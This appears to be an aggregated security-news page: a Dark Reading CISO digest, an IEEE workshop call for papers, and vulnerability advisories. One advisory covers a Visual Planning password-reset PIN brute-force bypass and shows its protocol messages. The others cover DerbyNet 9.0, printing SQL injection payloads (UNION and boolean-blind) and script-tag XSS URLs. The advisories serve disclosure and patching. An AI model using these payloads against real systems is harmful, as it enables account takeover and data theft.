Our collection of the most relevant reporting and industry perspectives for those guiding cybersecurity strategies and focused on SecOps. Also included: Dealing with a Ramadan cyber spike; funding Internet security; and Microsoft's Azure AI changes.

Welcome to CISO Corner, Dark Reading's weekly digest of articles tailored specifically to security operations readers and security leaders. Every week, we'll offer articles gleaned from across our news operation, The Edge, DR Technology, DR Global, and our Commentary section. We're committed to bringing you a diverse set of perspectives to support the job of operationalizing cybersecurity strategies, for leaders at organizations of all shapes and sizes.

**In this issue of CISO Corner:**

*   How CISOs Can Make Cybersecurity Awareness a Long-Term Priority for Boards
    
*   Global: Cybersecurity Threats Intensify in the Middle East During Ramadan
    
*   Funding the Organizations That Secure the Internet
    
*   How Soccer's 2022 World Cup in Qatar Was Nearly Hacked
    
*   Microsoft Beefs Up Defenses in Azure AI
    
*   Ivanti Pledges Security Overhaul the Day After 4 More Vulns Disclosed
    
*   Why Cybersecurity Is a Whole-of-Society Issue
    

**How CISOs Can Make Cybersecurity Awareness a Long-Term Priority for Boards**

Commentary by Shaun McAlmont, CEO, NINJIO Cybersecurity Awareness Training

Cybersecurity is far more than a check-the-box exercise. To create companywide buy-in, CISOs need to secure board support, up their communication game, and offer awareness-training programs to fight social engineering and help employees apply what they've learned.

CISOs play a vital role in building stakeholder support for cybersecurity across the company — including when it comes to earning long-term support for awareness training from their boards. Winning strategies include communicating cybersecurity concepts in an engaging and non-technical way, and showing board members that cybersecurity programs offer significant ROI.

This column lays out five ways that CISOs can show boards that it's time to prioritize cybersecurity:

1.  Know how to communicate with non-technical audiences. Cybersecurity is an intimidating subject for non-technical audiences, but it doesn't have to be. CISOs can make a comprehensible and convincing case for cybersecurity by pointing to the devastating real-world consequences of successful cyberattacks, for instance.
    
2.  Focus on the entire cyber-impact chain. Cyberattacks can lead to severe reputational damage, disrupted operations, legal and regulatory consequences, and crippling effects on the health of the company's workforce.
    
3.  Stress the human element. CISOs stress that 74% of all breaches involve a human element — an alarming reminder that social engineering remains one of the most powerful weapons in the cybercriminal arsenal.
    
4.  Outline how awareness-training programs can be measured. CISOs need to make accountability a central pillar of their case for awareness training. When board members see that cybersecurity spending is paying off, CISOs will be able to maintain support.
    
5.  Secure long-term support. Because the cyber threat landscape is always shifting, companies have to keep employees updated on the latest cybercriminal tactics — such as the use of AI to craft convincing and targeted phishing messages at scale.
    

Read more: How CISOs Can Make Cybersecurity a Long-Term Priority for Boards

Related: CISOs Struggle for C-Suite Status Even as Expectations Skyrocket

**Cybersecurity Threats Intensify in the Middle East During Ramadan**

By Alicia Buller, Contributing Writer, Dark Reading

How security teams in the region fortify their defenses amid short-staffing — and increased DDoS, phishing, and ransomware campaigns — during the Muslim holy month.

The ninth month of the Muslim calendar is observed around the world, as followers take the time to reflect and practice fasting, and cybersecurity teams often operate with skeletal staffing. Ramadan is also a period where Muslim shoppers tend to up their spending on specialty foods, gifts, and special offers.

All of this also creates a perfect storm for bad actors to conduct fraudulent activities and scams. Endpoint-protection firm Resecurity has observed a significant increase in cyber malevolence during Ramadan, which began on March 10. The company estimates the total financial impact from these cyberattacks and cyberscams against the Middle East has reached up to $100 million so far during this year's Ramadan.

Middle East-based companies can step up cybersecurity with extra vigilance and outsourced support amid shortened working hours and increased ecommerce activity.

"Many organizations proactively enhance their outsourced contracts during this period, particularly focusing on bolstering 24/7 security operations," says Shilpi Handa, associate research director of security, Middle East, Turkey, and Africa (META) at IDC, adding that deploying a remote and diverse workforce is particularly advantageous during Ramadan as around-the-clock security shifts can be fully covered by a mix of Muslim fasters and non-Muslim staff.

Read more: Cybersecurity Threats Intensify in the Middle East During Ramadan

Related: Middle East Leads in Deployment of DMARC Email Security

**Funding the Organizations That Secure the Internet**

By Jennifer Lawinski, Contributing Writer, Dark Reading

Common Good Cyber is a global consortium connecting nonprofit, private sector, and government organizations to fund organizations focused on securing Internet infrastructure.

There's no single entity responsible for maintaining and securing the Internet. Instead, that task falls upon a diverse group of organizations and individuals that preserve this public utility with little funding, or by subsisting on tight budgets. The stakes are incredibly high, but the amount of resources available for keeping this infrastructure secure falls short.

"Key components of the Internet are maintained by volunteers, nonprofits, and NGOs, and others who work with razor-thin budgets and resources," said Kemba Walden, president of Paladin Global Institute and former US acting national cyber director. "Consider this: The underpinnings of our digital infrastructure, the infrastructure that enables civil society to thrive in our economy today and to grow, rest on a network of volunteers, nonprofits, NGOs and others."

An initiative called Common Good Cyber is finding new ways to build adequate funding into law and policy, business policies and government, and other funding vehicles sufficient to meet the common need for cybersecurity. Ideas include creating joint funding organizations; federated fundraising for nonprofits; inventorying who is doing what to support the Internet's infrastructure; and a hub or accelerator to provide resources to the groups securing the Internet.

Read more: Funding the Organizations That Secure the Internet

Related: Neglecting Open Source Developers Puts the Internet at Risk

**How Soccer's 2022 World Cup in Qatar Was Nearly Hacked**

By Jai Vijayan, Contributing Writer, Dark Reading

A China-linked threat actor had access to a router configuration database that could have completely disrupted coverage, a security vendor says.

About six months before the 2022 FIFA World Cup soccer tournament in Qatar, a threat actor — later identified as China-linked BlackTech — quietly breached the network of a major communications provider for the games and planted malware on a critical system storing network device configurations.

The breach remained undetected until six months after the games, during which the cyber-espionage group gathered up an unknown volume of data from targeted customers of the telecommunications provider — including those associated with the World Cup and vendors providing services for it.

But it's the "what else could have happened" that's the really scary part: The access that BlackTech had on the telecom provider's system would have allowed the threat actor to completely disrupt key communications — including all streaming services associated with the game. The fallout from such a disruption would have been substantial in terms of geopolitical implications, brand damage, national reputation, and potentially hundreds of millions of dollars in losses from the licensing rights and ads negotiated prior to the World Cup.

Read more: How Soccer's 2022 World Cup in Qatar Was Nearly Hacked

Related: NFL, CISA Look to Intercept Cyber Threats to Super Bowl LVIII

**Microsoft Beefs Up Defenses in Azure AI**

By Jai Vijayan, Contributing Writer, Dark Reading

Microsoft adds tools to protect Azure AI from threats such as prompt injection, as well as to give developers the capabilities to ensure generative AI apps are more resilient to model and content manipulation attacks.

Amid growing concerns about threat actors using prompt injection attacks to get generative AI (GenAI) systems to behave in dangerous and unexpected ways, Microsoft's AI Studio is rolling out resources for developers to build GenAI apps that are more resilient to those threats.

Azure AI Studio is a hosted platform that organizations can use to build custom AI assistants, copilots, bots, search tools, and other applications, grounded in their own data.

The five new capabilities that Microsoft has added — or will soon add — are Prompt Shields, groundedness detection, safety system messages, safety evaluations, and risk and safety monitoring. The features are designed to address some significant challenges that researchers have uncovered recently — and continue to uncover on a routine basis — with regard to the use of large language models (LLMs) and GenAI tools.

"Generative AI can be a force multiplier for every department, company, and industry," said Microsoft's chief product officer of responsible AI, Sarah Bird. "At the same time, foundation models introduce new challenges for security and safety that require novel mitigations and continuous learning."

Read more: Microsoft Beefs Up Defenses in Azure AI

Related: Forget Deepfakes or Phishing: Prompt Injection is GenAI's Biggest Problem

**Ivanti Pledges Security Overhaul the Day After 4 More Vulns Disclosed**

By Jai Vijayan, Contributing Writer, Dark Reading

So far this year, Ivanti has disclosed a total of 10 flaws — many of them critical — in its remote access products, and one in its ITSM product.

Ivanti CEO Jeff Abbott this week said his company will completely revamp its security practices even as the vendor disclosed another fresh set of bugs in its vulnerability-riddled Ivanti Connect Secure and Policy Secure remote access products.

In an open letter to customers, Abbott committed to a series of changes the company will make in the coming months to transform its security operating model following a relentless barrage of bug disclosures since January. The promised fixes include a complete do-over of Ivanti's engineering, security, and vulnerability management processes and implementation of a new secure-by-design initiative for product development.

How much these commitments will help stem growing customer disenchantment with Ivanti remains unclear given the company's recent security track record. In fact, Abbot's comments came one day after Ivanti disclosed four new bugs in its Connect Secure and Policy Secure gateway technologies and issued patches for each of them.

Read more: Ivanti Pledges Security Overhaul the Day After 4 More Vulns Disclosed

Related: Feds to Microsoft: Clean Up Your Cloud Security Act Now

**Why Cybersecurity Is a Whole-of-Society Issue**

Commentary by Adam Maruyama, Field CTO, Garrison Technology

Working together and integrating cybersecurity as part of our corporate and individual thinking can make life harder for hackers and safer for ourselves.

We are drowning in vulnerabilities: Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA), at a recent Congressional hearing on Chinese cyber operations, said simply that "we've made it easy on" attackers through poor software design. But it will take a whole-of-society effort to reshape the market for cybersecurity to create technologies that are both high-performing and secure.

As CISA articulated in its Secure by Design initiative, secure coding by vendors is the first step to creating technologies that are both secure and usable. But businesses must realize, as Easterly put it, that "cyber-risk is business risk" by incorporating cybersecurity into all their business practices. In particular, by increasing the stature of CISOs and giving them holistic cybersecurity oversight of the entire business, particularly procurement decisions, companies can incorporate cybersecurity as an organic step in business processes.

Meanwhile, cybersecurity and IT professionals — two closely related but often clashing groups — must come together to build networks that are both secure and functional for their users. And, the final piece of a whole-of-society approach to cybersecurity is both the most difficult and the most critical: integrating cybersecurity into the day-to-day lives of citizens through things like multifactor authentication.

Read more: Why Cybersecurity Is a Whole-of-Society Issue

Related: NIST Wants Help Digging Out of Its NVD Backlog

CISO Corner: Ivanti's Mea Culpa; World Cup Hack; CISOs &amp; Cyber Awareness

The IEEE CSR Workshop on Cyber Forensics and Advanced Threat Investigations in Emerging Technologies organizing committee is inviting you to submit your research papers. The workshop will be held in Hybrid mode. The in-person mode will held at Hilton London Tower Bridge, London from September 2nd through the 4th, 2024.

    Dear Colleagues,IEEE CSR Workshop on Cyber Forensics and Advanced Threat Investigations inEmerging Technologies organizing committee is inviting you to submit yourresearch papers. The workshop will be held in Hybrid mode. The in-personmode will held at Hilton London Tower Bridge, London from 2 to 4 September2024Topics include (but not limited to):-Forensics and threat investigations in P2P, cloud/edge, SDN/NFV, VPN, and social networks-Forensics and threat investigations in IoT, smart tech (car, home, city),e/m-health-Forensics and visualization of big data-Tools and services for cyber forensics and threat investigations-Attack detection, traceback, and attribution in emerging technologies-Malware analysis and attribution-Methods for reconstruction of digital evidence in emerging technologies-Security and privacy in P2P, cloud/edge, SDN/NFV, VPN, and social networks-Security and privacy in IoT, smart tech (car, home, city)-Open source intelligence (OSINT)-Dark Web Investigations-Digital evidence extraction/analysis using  AI/ML and data mining-Data exfiltration from networked devices/services(e.g.cyber-physicalsystems, IoT)-Large-scale investigations and ML for the analysis of intelligence datasets and logsWe also encourage contributions describing innovative work in the realm ofcybersecurity, cyber defense, and digital crimes.Important DatesPaper Submission Deadline: June 3, 2024 AOEAuthors Notifications: July 3, 2024 AOECamera Ready submission: July 14, 2024 AOEEarly registration deadline: July 20, 2024 AOEPublicationThe workshop’s proceedings will be published by IEEE and will be includedin IEEE Xplore.Workshop Awards-Best Open-Source Tool Prize, which will be presented in a paper during ourworkshop. The prize, valued at 300 euros,  is being financed by one of ourcollaborators from the industry.-An additional industry collaborator is sponsoring the prestigious BestPaper award, which includes a one-year free license to utilize renowneddigital forensics software.This Workshop is Technically Supported by-Association of Cyber Forensics and Threat Investigators-Industrial Cybersecurity Center-Institute for Systems and Technologies of Information, Control, andCommunicationTo submit your manuscript, please follow the instructions athttps://www.acfti.org/news-events/ieee-csr-cfati-cfp-2024For more information, please don't hesitate to contact the CFATI GeneralChair Dr. Ahmed Elmesiry (a.elmesiry-at-londonmet.ac.uk)To get more news about our events, please join our low-traffic announcementgroup @ https://groups.google.com/g/acftiWe look forward to your submissions.Regards,Andrew Zayin Ph.D., CISSP, CISM, CRISC, CDPSE, PMPACFTI Secretariat

IEEE CSR Workshop 2024 Call For Papers

Unauthenticated attackers can exploit a weakness in the password reset functionality of the Visual Planning application in order to obtain access to arbitrary user accounts including administrators. In case administrative (in the context of Visual Planning) accounts are compromised, attackers can install malicious modules into the application to take over the application server hosting the Visual Planning application. All versions prior to Visual Planning 8 (Build 240207) are affected.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2023-004: Authentication Bypass via Password Reset   
Functionality in Visual Planning

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2023-49232

Link  
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-004/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-004.txt

Affected products/vendor  
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary  
=======

Unauthenticated attackers can exploit a weakness in the password reset   
functionality of the Visual Planning[0] application in order to obtain   
access to arbitrary user accounts including administrators. In case   
administrative (in the context of Visual Planning) accounts are   
compromised, attackers can install malicious modules into the   
application to take over the application server hosting the Visual   
Planning application.

Risk  
====

The application does not impose any limits on the number of guesses that   
can be made. Attackers can therefore initiate the reset for arbitrary   
users and automate the pin validation process until a valid pin is   
obtained. The vulnerability allows unauthenticated attackers to gain   
access to arbitrary user accounts including administrators.

Failed pin validation attempts are not logged by the application which   
greatly increases the difficulty of detecting ongoing attacks.

With administrative access to Admin Center, attackers can install   
malicious modules containing Java code that is executed on the   
application server, resulting in arbitrary command execution.

The entire pin space can be enumerated in approximately one to two hours.

Description  
===========

During a recent red teaming assessment, Visual Planning was identified   
as part of the customers internet-facing assets. The software is   
developed by STILOG I.S.T. and provides resource management and   
scheduling features. A security assessment conducted by SCHUTZWERK found   
an authentication bypass in Visual Planning's password reset functionality.  
The application Admin Center (vpadmin) communicates with the server   
through an XML-based protocol that utilizes proprietary compression   
methods and is transmitted via HTTP. SCHUTZWERK implemented a custom   
proxy as part of an assessment in order to intercept and manipulate the   
messages exchanged between application and server.

One of the first messages sent by the Admin Center application after   
launch is the following:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.NamedMethodParameter>  
<methodName>canResetPassword</methodName>  
<rawResult>false</rawResult>  
<userSession isNull="true"/>  
<values/>  
</com.visualplanning.query.NamedMethodParameter>

In this request, the client asks the server whether it should display   
the "Forgot your password ?" button as part of the login form. During   
the assessment, the server responded as follows:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.QueryResult>  
<resultValues>  
<HashtableValue>  
<key>resetPassword</key>  
<value class="java.lang.Boolean">false</value>  
</HashtableValue>  
</resultValues>  
<status>OK</status>  
</com.visualplanning.query.QueryResult>

By altering the value to "true", the password reset functionality   
becomes accessible in the application. At this point, attackers can   
provide the target username. This causes a request similar to the   
following to be issued:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.NamedMethodParameter>  
<methodName>sendResetPasswwd</methodName>  
<rawResult>false</rawResult>  
<userSession isNull="true"/>  
<values>  
<HashtableValue>  
<key>login</key>  
<value class="String">admin</value>  
</HashtableValue>  
</values>  
</com.visualplanning.query.NamedMethodParameter>

While handling this request, the server generates a five digit numeric   
pin and tries to send it to the email address associated with the   
provided username. Regardless of whether the email could be successfully   
transmitted, the generated pin is stored in a attribute of the session   
used while performing the reset. It should be noted that the password   
reset request message can be sent directly without enabling the button   
in the GUI if the message format is already known.

To complete the reset process, the correct pin (matching the pin stored   
in the session attribute) must be specified. A message similar to the   
following is issued by the application to validiate the provided pin:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.NamedMethodParameter>  
<methodName>validateResetPasswwd</methodName>  
<rawResult>false</rawResult>  
<userSession isNull="true"/>  
<values>  
<HashtableValue>  
<key>login</key>  
<value class="String">admin</value>  
</HashtableValue>  
<HashtableValue>  
<key>userCode</key>  
<value class="String">58344</value>  
</HashtableValue>  
</values>  
</com.visualplanning.query.NamedMethodParameter>

When an invalid pin is provided, the server responds with the following   
XML document:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.QueryResult>  
<resultValues>  
<HashtableValue>  
<key>ERROR</key>  
<value class="String">Invalid code.</value>  
</HashtableValue>  
</resultValues>  
<status>KO</status>  
</com.visualplanning.query.QueryResult>

In case the pin is valid, the server responds with a VPUser data   
structure similar to the following:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.QueryResult>  
<resultValues>  
<HashtableValue>  
<key>vpUser</key>  
<value class="com.visualplanning.data.admin.VPUser">  
<ID>1</ID>  
<UID>C442-53EB-B185-8804-F6BF-70AC-61C3-31BC</UID>  
<activated>true</activated>  
<comments>Super administrateur</comments>  
<email>yahd6Coo@schutzwerk.com</email>  
<expiredPasswd>false</expiredPasswd>  
<groups/>  
<imageProfilBase64></imageProfilBase64>  
<ldapSetting>  
<entityID>-1</entityID>  
</ldapSetting>  
<licenses/>  
<loginAttemps>0</loginAttemps>  
<mobilePhoneNumber></mobilePhoneNumber>  
<name>admin</name>  
<ownerID>0</ownerID>  
<phoneNumber></phoneNumber>  
<platform>VP</platform>  
<resetPasswd>true</resetPasswd>  
<resourceUser>false</resourceUser>  
</value>  
</HashtableValue>  
</resultValues>  
<status>OK</status>  
</com.visualplanning.query.QueryResult>

In addition, an empty password is set for the target username. Upon   
first login after reset, a new password must be set for this user.

Solution/Mitigation  
===================

The vendor suggests to update to Visual Planning 8 (Build 240207)

Disclosure timeline  
===================

2023-11-01: Vulnerability discovered  
2023-11-09: Contact vendor in order to determine security contact  
2023-11-10: Received generic sales response from vendor  
2023-11-14: Contacted CTO of vendor directly  
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor  
2023-11-24: CVE assigned by Mitre  
2023-11-24: Additional technical details provided to vendor  
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings   
is in progress  
2024-01-30: Inquired about mitigation status regarding the reported   
vulnerabilities  
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were   
already fixed  
2024-03-08: Sent advisory drafts to vendor  
2024-03-28: Received patch information and release of advisory

Contact/Credits  
===============

The vulnerability was discovered during an assessment by Lennert Preuth   
and David Brown of SCHUTZWERK GmbH.

References  
==========

[0] https://www.visual-planning.com/en/  
[1]   
https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html

Disclaimer  
==========

The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The   
most recent version of this security advisory can be found at SCHUTZWERK   
GmbH's website ( https://www.schutzwerk.com ).

Additional information  
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0TAaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrtU9xAArJL5rKh3sNRto6xC7bgj  
660J6OALXG9O9qaJo1RHYsVo9287THvSgsPs8/YXZhFNtkccsdxRll3t3UxC3IOU  
/h+f612I4lFlk9t0LVH2eu6r8lTw47YLbO9RKoBF0TsysJMnytuM9+BxRyd+nLVo  
rfVxmRfUhDKf5odkDz8IeatmMMeI1e7JuGylWtVOkSxdbCsmwEbObrEsCwe74AR4  
PKJDVb6tq03q1g5H0yq7QLCMyuN7UBc0Jb/sYkL3hu0m7JlqyCVUfNBaD1pqZvlA  
C3b+DnrJHwAPYKr5I4pKfss5Ghh3+yIaS/UIyaIImgS6pyBDOJUHULiMKumZYHCl  
r3YWOLAjuTUztRmsktavjgItsf2NsXnBLYMDjZuZtBd6iU7iNKQ4EdbCNt8YCN8w  
KmU3ot2Kwjty2aLj7CBdg8Mrc4Rr3PH2PoXWxSEBMWqokoO2zWVft+5BpJ/onU2P  
um41+KNb7h7Pf/QVkU1KOZbwAI9tgJvZn2hHXmbQov0w3s0J9dqNoJ4Eu+qVPMAx  
+Ug9Qvo3Qh325pDEeqxUhOsPh4dHam97ouDYE3XXLlKk8rar8TjhANAHHO4uUltW  
gikWB1VVmGy7XS9lflWE1QLqO8BBK1jZUDU21fWQeAeF64R6NXikj0tkfvjOwwt/  
CTQ2Nugk2kdYf5d73FSO9ds=  
=PvYR  
-----END PGP SIGNATURE-----

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Visual Planning 8 Authentication Bypass

DerbyNet 9.0 suffers from a remote SQL injection vulnerability in print/render/racer.inc.

CVE ID: CVE-2024-30923

Description:  
An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, specifically within the `print/render/racer.inc` component. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information by exploiting improper sanitization of the `where` clause in Racer Document Rendering.

Vulnerability Type: SQL Injection

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: print/render/racer.inc

Attack Type: Remote

Impact:  
- Code execution: True  
- Information Disclosure: True

Attack Vectors:  
The vulnerability is present in the `print/render/racer.inc` component of DerbyNet, due to insufficient sanitization of the `where` parameter within the URL. Attackers can manipulate SQL queries by injecting malicious SQL commands through the `where` parameter, as demonstrated in the following URL:  
- `http://127.0.0.1:8000/render-document.php/award/GoldCupAwardDocument?where=1`

This manipulation could lead to unauthorized access to database information and potential code execution on the server hosting the application.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 print/render/racer.inc SQL Injection

DerbyNet 9.0 suffers from a remote SQL injection vulnerability in print/render/award.inc.

    CVE ID: CVE-2024-30922Description:A SQL Injection vulnerability has been identified in DerbyNet version 9.0, specifically affecting the 'where' clause in Award Document Rendering through the component `print/render/award.inc`. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information without requiring authentication.Vulnerability Type: SQL InjectionVendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: print/render/award.incAttack Type: RemoteImpact:- Code execution: True- Information Disclosure: TrueAttack Vectors:The vulnerability in the document rendering endpoint, particularly within `print/render/award.inc`, is exposed to an unauthenticated SQL Injection. This flaw allows attackers to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access and manipulation.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 print/render/award.inc SQL Injection

DerbyNet 9.0 suffers from a remote SQL injection vulnerability in ajax/query.slide.next.inc.

    CVE ID: CVE-2024-30928Description:An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, particularly within the `ajax/query.slide.next.inc` file. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information by exploiting the unvalidated `classids` parameter used in constructing SQL queries. This parameter is not properly sanitized before being included in the SQL statement, leading to a critical risk of SQL Injection.Vulnerability Type: SQL InjectionVendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: ajax/query.slide.next.incAttack Type: RemoteImpacts:- Code execution: True- Information Disclosure: TrueAttack Vectors:The vulnerability is primarily exploited by manipulating the `classids` parameter in the user's request to the `ajax/query.slide.next.inc` file. The lack of adequate input validation allows attackers to inject malicious SQL code through this parameter. Example attack vectors include:- Direct exploitation:- `http://127.0.0.1:8000/action.php?query=slide.next&mode=racer&classids=1`- Boolean-based blind SQL Injection:- Payload: `query=slide.next&mode=racer&classids=1) AND 4365=4365 AND (6880=6880`- UNION query SQL Injection:- Payload: `query=slide.next&mode=racer&classids=-3890) UNION ALL SELECT NULL,NULL,CHAR(113,107,120,122,113)||CHAR(79,97,117,85,112,79,82,85,75,114,65,66,118,100,117,107,79,118,111,104,67,105,87,86,72,110,107,119,113,86,106,107,115,100,110,109,98,77,85,115)||CHAR(113,118,120,120,113),NULL,NULL,NULL,NULL,NULL-- rDzQ`These vectors demonstrate how an attacker could manipulate SQL queries to potentially access or manipulate database information unauthorizedly.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 ajax/query.slide.next.inc SQL Injection

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in playlist.php.

    CVE ID: CVE-2024-30929Description:A Cross-Site Scripting (XSS) vulnerability has been found in DerbyNet version 9.0, affecting the `playlist.php` component. This issue allows remote attackers to execute arbitrary code by exploiting the `back` parameter. The application does not properly sanitize the `back` parameter before it is rendered on the page, thereby allowing the injection and execution of arbitrary JavaScript code.Vulnerability Type: Cross-Site Scripting (XSS)Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: playlist.phpAttack Type: RemoteImpact: Code executionAttack Vectors:The vulnerability can be exploited by crafting a URL that includes malicious JavaScript code as part of the `back` parameter. An example of such a URL is:- http://127.0.0.1:8000/playlist.php?back="><script>alert(1)</script>This example demonstrates how an attacker could inject and execute JavaScript within the context of the webpage, leading to potential security risks such as session hijacking, phishing, or unauthorized actions performed on behalf of the user.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 playlist.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in racer-results.php.

CVE ID: CVE-2024-30927

Description:  
A Cross-Site Scripting (XSS) vulnerability is present in DerbyNet version 9.0, specifically within the `racer-results.php` component. This issue allows remote attackers to execute arbitrary code through the improper handling of the `racerid` parameter. The vulnerability is notably present within the HTML `<title>` tag, where the `racerid` parameter value is dynamically inserted directly into the page content without any sanitization or encoding.

Vulnerability Type: Cross-Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: racer-results.php

Attack Type: Remote

Impact: Code execution

Attack Vectors:  
The XSS vulnerability can be exploited by inserting malicious JavaScript code into the `racerid` parameter of the URL. For example:  
- `http://127.0.0.1:8000/racer-results.php?racerid=</title><script>alert(1)</script>`

This method demonstrates how an attacker could manipulate the `racerid` parameter to inject and execute arbitrary JavaScript within the context of a user's session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 racer-results.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in inc/kiosks.inc.

CVE ID: CVE-2024-30926

Description:  
A Cross-Site Scripting (XSS) vulnerability has been identified in DerbyNet version 9.0, affecting the `./inc/kiosks.inc` component. This vulnerability permits remote attackers to execute arbitrary code by exploiting the `address_for_current_kiosk()` function. The issue stems from the improper sanitization of user-supplied input via the URL parameters `id` and `address`, which are directly utilized without validation. This oversight allows the execution of malicious JavaScript code through crafted URLs.

Vulnerability Type: Cross-Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: ./inc/kiosks.inc

Attack Type: Remote

Impact: Code execution

Attack Vectors:  
The vulnerability can be exploited by manipulating URL parameters to inject malicious scripts. Examples include:  
- `http://127.0.0.1:8000/kiosk.php?id=<script>alert(1)</script>`  
- `http://127.0.0.1:8000/kiosk.php?address=<script>alert(1)</script>`

These manipulations demonstrate how an attacker could leverage unsanitized input to execute arbitrary JavaScript in the context of a user's session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 inc/kisosks.inc Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in photo-thumbs.php.

CVE ID: CVE-2024-30925

Description:  
A Cross-Site Scripting (XSS) vulnerability exists in DerbyNet version 9.0, specifically within the `photo-thumbs.php` component. This issue enables a remote attacker to execute arbitrary code through the improper handling of the `racerid` and `back` parameters. The vulnerability arises because the application dynamically generates URLs for navigation without adequately sanitizing these parameters, thus allowing the injection of malicious scripts.

Vulnerability Type: Cross-Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: photo-thumbs.php

Attack Type: Remote

Impact: Code execution

Attack Vectors:  
The XSS vulnerability can be exploited through manipulation of the `racerid` and `back` parameters in the URL. Examples of such manipulation include:  
- http://127.0.0.1:8000/photo-thumbs.php?repo=head&racerid=</script><script>alert(1)</script>  
- http://127.0.0.1:8000/photo-thumbs.php?back="><script>alert(1)</script></div>

These URLs demonstrate how an attacker could inject and execute arbitrary JavaScript within the context of the user's browser session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

Tag

#git